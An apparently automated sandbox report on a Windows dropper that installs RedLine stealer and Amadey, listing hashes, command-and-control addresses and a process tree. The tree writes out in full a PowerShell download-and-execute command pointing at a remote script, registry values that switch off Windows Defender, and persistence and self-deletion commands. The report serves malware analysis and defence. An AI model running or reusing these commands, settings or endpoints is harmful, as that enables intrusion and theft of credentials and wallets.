Analysis
-
max time kernel
52s -
max time network
117s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
21-03-2023 00:08
Static task
static1
General
-
Target
b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe
-
Size
960KB
-
MD5
435d35c9fbfa24c22b75af34b888f5d8
-
SHA1
1cf5b4598d925f6c07e640f82697b0c6f0603470
-
SHA256
b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67
-
SHA512
ed15dc153ee41c43d610019f8a003390f50314975fbd28a1629130b15995743b6403e127c07a4a6f038f0619bba049bec9b8ea5ac5ae7f2bf1896ab448440acf
-
SSDEEP
12288:kMrEy9099YhUTqPDT/DjFnPiCvky0Ah3clhtrLpci0cC8XYKpTEe53aLuJVr6cGZ:wyqQUiuOcXDchx8oK5HfbkH3jyI
Malware Config
Extracted
https://www.mdegmm.com/pdf/debug2.ps1
Extracted
redline
gena
193.233.20.30:4125
-
auth_value
93c20961cb6b06b2d5781c212db6201e
Extracted
redline
vint
193.233.20.30:4125
-
auth_value
fb8811912f8370b3d23bffda092d88d0
Extracted
amadey
3.68
62.204.41.87/joomla/index.php
Extracted
redline
14
45.12.253.144:40145
-
auth_value
6528d0f243ad9e530a68f2a487521a80
Signatures
-
Processes:
tz9613.exev4840vR.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" tz9613.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" v4840vR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" tz9613.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" tz9613.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" tz9613.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" tz9613.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" v4840vR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" v4840vR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" v4840vR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" v4840vR.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 22 IoCs
Processes:
resource yara_rule behavioral1/memory/988-200-0x00000000049D0000-0x0000000004A16000-memory.dmp family_redline behavioral1/memory/988-201-0x0000000004A50000-0x0000000004A94000-memory.dmp family_redline behavioral1/memory/988-202-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-203-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-205-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-207-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-209-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-211-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-213-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-215-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-217-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-219-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-221-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-223-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-225-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-227-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-229-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-235-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-233-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-231-0x0000000004A50000-0x0000000004A8E000-memory.dmp family_redline behavioral1/memory/988-378-0x0000000004A90000-0x0000000004AA0000-memory.dmp family_redline behavioral1/memory/988-1125-0x0000000004A90000-0x0000000004AA0000-memory.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 29 4460 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
zap6445.exezap5162.exezap7279.exetz9613.exev4840vR.exew28IK23.exexbmVZ47.exey35fU11.exelegenda.exebuil.exesqlcmd.exeworld.exesqlcmd.exepid process 2416 zap6445.exe 2680 zap5162.exe 3348 zap7279.exe 2064 tz9613.exe 3496 v4840vR.exe 988 w28IK23.exe 4704 xbmVZ47.exe 3920 y35fU11.exe 2748 legenda.exe 5056 buil.exe 4112 sqlcmd.exe 4120 world.exe 2388 sqlcmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
v4840vR.exetz9613.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" v4840vR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" tz9613.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features v4840vR.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exezap6445.exezap5162.exezap7279.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap6445.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" zap6445.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap5162.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" zap5162.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap7279.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" zap7279.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 9 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2672 PING.EXE 2648 PING.EXE 1736 PING.EXE 1284 PING.EXE 4744 PING.EXE 4112 PING.EXE 320 PING.EXE 4384 PING.EXE 1624 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
tz9613.exev4840vR.exew28IK23.exexbmVZ47.exepowershell.exepid process 2064 tz9613.exe 2064 tz9613.exe 3496 v4840vR.exe 3496 v4840vR.exe 988 w28IK23.exe 988 w28IK23.exe 4704 xbmVZ47.exe 4704 xbmVZ47.exe 4460 powershell.exe 4460 powershell.exe 4460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
tz9613.exev4840vR.exew28IK23.exexbmVZ47.exebuil.exepowershell.exedescription pid process Token: SeDebugPrivilege 2064 tz9613.exe Token: SeDebugPrivilege 3496 v4840vR.exe Token: SeDebugPrivilege 988 w28IK23.exe Token: SeDebugPrivilege 4704 xbmVZ47.exe Token: SeDebugPrivilege 5056 buil.exe Token: SeDebugPrivilege 4460 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exezap6445.exezap5162.exezap7279.exey35fU11.exelegenda.execmd.exePING.EXEbuil.execmd.execmd.exedescription pid process target process PID 2140 wrote to memory of 2416 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe zap6445.exe PID 2140 wrote to memory of 2416 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe zap6445.exe PID 2140 wrote to memory of 2416 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe zap6445.exe PID 2416 wrote to memory of 2680 2416 zap6445.exe zap5162.exe PID 2416 wrote to memory of 2680 2416 zap6445.exe zap5162.exe PID 2416 wrote to memory of 2680 2416 zap6445.exe zap5162.exe PID 2680 wrote to memory of 3348 2680 zap5162.exe zap7279.exe PID 2680 wrote to memory of 3348 2680 zap5162.exe zap7279.exe PID 2680 wrote to memory of 3348 2680 zap5162.exe zap7279.exe PID 3348 wrote to memory of 2064 3348 zap7279.exe tz9613.exe PID 3348 wrote to memory of 2064 3348 zap7279.exe tz9613.exe PID 3348 wrote to memory of 3496 3348 zap7279.exe v4840vR.exe PID 3348 wrote to memory of 3496 3348 zap7279.exe v4840vR.exe PID 3348 wrote to memory of 3496 3348 zap7279.exe v4840vR.exe PID 2680 wrote to memory of 988 2680 zap5162.exe w28IK23.exe PID 2680 wrote to memory of 988 2680 zap5162.exe w28IK23.exe PID 2680 wrote to memory of 988 2680 zap5162.exe w28IK23.exe PID 2416 wrote to memory of 4704 2416 zap6445.exe xbmVZ47.exe PID 2416 wrote to memory of 4704 2416 zap6445.exe xbmVZ47.exe PID 2416 wrote to memory of 4704 2416 zap6445.exe xbmVZ47.exe PID 2140 wrote to memory of 3920 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe y35fU11.exe PID 2140 wrote to memory of 3920 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe y35fU11.exe PID 2140 wrote to memory of 3920 2140 b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe y35fU11.exe PID 3920 wrote to memory of 2748 3920 y35fU11.exe legenda.exe PID 3920 wrote to memory of 2748 3920 y35fU11.exe legenda.exe PID 3920 wrote to memory of 2748 3920 y35fU11.exe legenda.exe PID 2748 wrote to memory of 4948 2748 legenda.exe schtasks.exe PID 2748 wrote to memory of 4948 2748 legenda.exe schtasks.exe PID 2748 wrote to memory of 4948 2748 legenda.exe schtasks.exe PID 2748 wrote to memory of 4384 2748 legenda.exe cmd.exe PID 2748 wrote to memory of 4384 2748 legenda.exe cmd.exe PID 2748 wrote to memory of 4384 2748 legenda.exe cmd.exe PID 4384 wrote to memory of 4376 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 4376 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 4376 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 4436 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 4436 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 4436 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 1420 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 1420 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 1420 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5024 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 5024 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 5024 4384 cmd.exe cmd.exe PID 4384 wrote to memory of 5100 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5100 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5100 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5084 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5084 4384 cmd.exe cacls.exe PID 4384 wrote to memory of 5084 4384 cmd.exe cacls.exe PID 2748 wrote to memory of 5056 2748 legenda.exe buil.exe PID 2748 wrote to memory of 5056 2748 legenda.exe buil.exe PID 2748 wrote to memory of 4112 2748 legenda.exe sqlcmd.exe PID 2748 wrote to memory of 4112 2748 legenda.exe sqlcmd.exe PID 2748 wrote to memory of 4112 2748 legenda.exe sqlcmd.exe PID 4112 wrote to memory of 1708 4112 PING.EXE cmd.exe PID 4112 wrote to memory of 1708 4112 PING.EXE cmd.exe PID 5056 wrote to memory of 68 5056 buil.exe cmd.exe PID 5056 wrote to memory of 68 5056 buil.exe cmd.exe PID 1708 wrote to memory of 4460 1708 cmd.exe powershell.exe PID 1708 wrote to memory of 4460 1708 cmd.exe powershell.exe PID 68 wrote to memory of 376 68 cmd.exe chcp.com PID 68 wrote to memory of 376 68 cmd.exe chcp.com PID 68 wrote to memory of 320 68 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe"C:\Users\Admin\AppData\Local\Temp\b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap6445.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap6445.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap5162.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap5162.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7279.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7279.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9613.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9613.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4840vR.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4840vR.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w28IK23.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w28IK23.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xbmVZ47.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xbmVZ47.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y35fU11.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y35fU11.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe"C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exeC:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDAFilesize
2KB
MD5fc88b7748eb4cd37ae886a1c0813e4cf
SHA123e30b76fc94f0467a3efad342a91a3b84ff1eea
SHA2563d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da
SHA512bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691Filesize
1KB
MD5cb684ec7fe8555f949182c7423dafdc2
SHA1ec49f7b4b777fa1da40af5328785782127ffc52c
SHA2568e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e
SHA512ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDAFilesize
482B
MD5743d415df75901077e883956bf113588
SHA1806f76cd54e1902fb51a38d6bd73debcb93207d5
SHA256b7ca202e7724bc91aa6fe8347d81c02d5e5d58f792dc555a22e99741bd31713b
SHA51247ca9d993cc1f18605ea3074a5c5b122eba6449ceb82a46d9c654bc6167ded11b90a5342cbd7f23ab1325c1bd09303b51939e42452807c6aae8f106ff6196222
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691Filesize
486B
MD503a0a5d307b7efca3869f2495a30007d
SHA10b37a3038f50388d9019679ca13c0d61f0db01b6
SHA2562d12db7714490668da304d120e80742b35e48e332a72b996a0d93cbdfc2d0870
SHA512bc74258cd4de8f50796984cc5730dba7c0445873392ae506e695a67dfb1274b4855f3f4d6fdd7b3b015007b95c098fb4f8a3ad1161f54f4f5fd64f2d9f92830a
-
C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exeFilesize
32KB
MD5495ce8bc963f4b0d156e4b7e5ed97ed4
SHA12a2f72bbb5f111e0c8dd9038ea213dca3783e266
SHA25666e254d86a825aaba511f1d0b75ceb4520fa38d518b305a770a03fdb17dc1243
SHA5125ad2ea5696ffecf3318c5c2233da79fc0b849ac92a1550adda04f915196f831292f39058f38fd636b5615d93bbe6eedb489b0ef96bd7199c8a6ab1605e13e244
-
C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exeFilesize
32KB
MD5495ce8bc963f4b0d156e4b7e5ed97ed4
SHA12a2f72bbb5f111e0c8dd9038ea213dca3783e266
SHA25666e254d86a825aaba511f1d0b75ceb4520fa38d518b305a770a03fdb17dc1243
